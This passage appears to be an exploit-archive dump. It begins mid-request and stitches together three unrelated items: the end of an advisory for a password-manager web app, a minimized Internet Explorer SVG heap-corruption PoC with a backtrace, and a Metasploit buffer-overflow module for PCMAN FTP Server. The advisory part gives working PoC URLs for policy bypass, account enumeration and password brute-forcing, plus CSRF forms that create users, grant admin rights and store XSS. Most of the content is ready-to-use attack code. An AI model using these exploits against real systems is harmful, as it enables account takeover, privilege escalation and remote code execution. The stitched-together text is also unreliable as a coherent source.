-----------------------------20780287114832
Content-Disposition: form-data; name="USER"
username
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDLANG"
en
-----------------------------20780287114832
Content-Disposition: form-data; name="EMAIL"
pwned@user.com
-----------------------------20780287114832
Content-Disposition: form-data; name="ROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="superAdmin"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="Rule"
Strong
-----------------------------20780287114832
Content-Disposition: form-data; name="DEPT"
-----------------------------20780287114832
Content-Disposition: form-data; name="LOCATION"
-----------------------------20780287114832
Content-Disposition: form-data; name="mobileaccess"
enable
-----------------------------20780287114832
Content-Disposition: form-data; name="UserCert"; filename=""
Content-Type: application/octet-stream
-----------------------------20780287114832
Content-Disposition: form-data; name="lang_code"
en
-----------------------------20780287114832--
(3) Business Login Bypass in /EditUser.do
The application allows only the creation of certain amount of
Administrator, based on the licences. However it is possible to create
more administrators. In order to exploit this go to the user
administration page, and edit a user id. Save the edition without
making any modification and intercept that POST message. Modify both
parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
the user role will be changed to this one. Every user can be converted
to an administrator even if the license does not allow that much. The
application only check the amount of administrators when "ROLE" is
Administrator but "OLDROLE" is another one.
(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
Every time a password for a user account or resource's user account
is being changed, a request is sent to this path in order to validate
the password against the password policy. Despite the fact the the
password is being sent in the URL (this means it could be logged in
any proxy or even in the browser), the policy against the password is
being evaluated could by changed by modifying the parameter "Rule"
from the value it currently has to "Low", in order to be evaluated
with a lower policy. For example:
[PoC]
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same happens when a Listener
needs to be suspended. However this could be bypassed by creating and
approving the listener by the same administrator. This could be
achieved by forging a GET request like the following. The only
parameter that needs to be changed is the "LISTENERID" which is a
sequence number that represents the Listener.
[PoC]
Listener Approval
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
Listener Suspension
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
It is possible to enumerate resource's user accounts by forging a
GET request as follows. This URL allows, if a user has access, to
retrieve the account password. However if a user does not have access,
the error message changes if the user exists or not. The only
parameters that needs to be modified are "Resource" and "Account".
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
The error messages identifies if the account exists for that resource.
Account exists: ____ACCESS___DENIED__
Resource/Account does not exists: FAILURE
(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
It is possible to enumerate resource's user passwords by forging a
GET request as follows. This URL is used in order to validate a user
password against the password policy specified. By being able to
change the password policy it is possible to use the "Low" policy
which does not allow to reuse the password that is currently setup for
the user. If an error message that the password could not be reused
appears, that indicate that the password is the current password for
that account.
The only parameters that needs to be modified are "Password" and
"ACCID", and ensure that the password policy "Rule" parameter is set
to low.
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
The error messages identifies if the password is correct or not
for every user account.
Password matches: "Password cannot be same as last 1 passwords"
Password does not match: "SUCCESS"
Account ID does not exists: "Error in validating password policy"
(8) Cross-Site Request Forgery
The application is vulnerable to Cross-Site Request Forgery, which
by sending specific POST messages it is possible create a user in the
system (1), elevate privileges for a user (2)(4), and store a XSS in
the user's personal passwords (3). Below are two PoC
[PoC]
User Creation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
<input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
<input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="" name="dept" type="hidden"><input
value="true" type="hidden">
<input value="false" name="location"
type="hidden"><input value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
<input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
<input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
<input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
<input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Stored XSS
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="service" value="1" />
<input type="hidden" name="serviceurl" value="1" />
<input type="hidden" name="loginname" value="1" />
<input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
<input type="hidden" name="spassword" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="Rule" value="Low" />
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="SKIP_PREF" value="true" />
<input type="hidden" name="Admin" value="hacker" />
<input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
<input type="submit" value="Submit">
</form>
</body>
</html>
--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691
Minimized PoC:
-->
<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
<script><![CDATA[
function handler() {
inner.setAttribute("viewBox");
}
outer.addEventListener("DOMAttrModified", function () { handler(); });
doc = document.implementation.createDocument("", "", null);
doc.adoptNode(rect.attributes[0]);
]]></script>
</svg>
<!--
Backtrace for reference:
2:052:x86> k 10
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
0bb14d4c 60dca53f vfbasics+0x13246
0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe
ct>+0xb6
0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
-->
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
},
'Author' =>
[
'Jay Turla', # Initial Discovery -- @shipcod3
'Chris Higgins' # msf Module -- @ch1gg1ns
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '37731'],
[ 'OSVDB', '94624']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 English',
{
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
'Offset' => 2007
}
],
],
'DisclosureDate' => 'Aug 07 2015',
'DefaultTarget' => 0))
end
def check
connect_login
disconnect
if /220 PCMan's FTP Server 2\.0/ === banner
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
connect_login
print_status('Generating payload...')
sploit = rand_text_alpha(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(16)
sploit << payload.encoded
send_cmd( ["PUT", sploit], false )
disconnect
end
end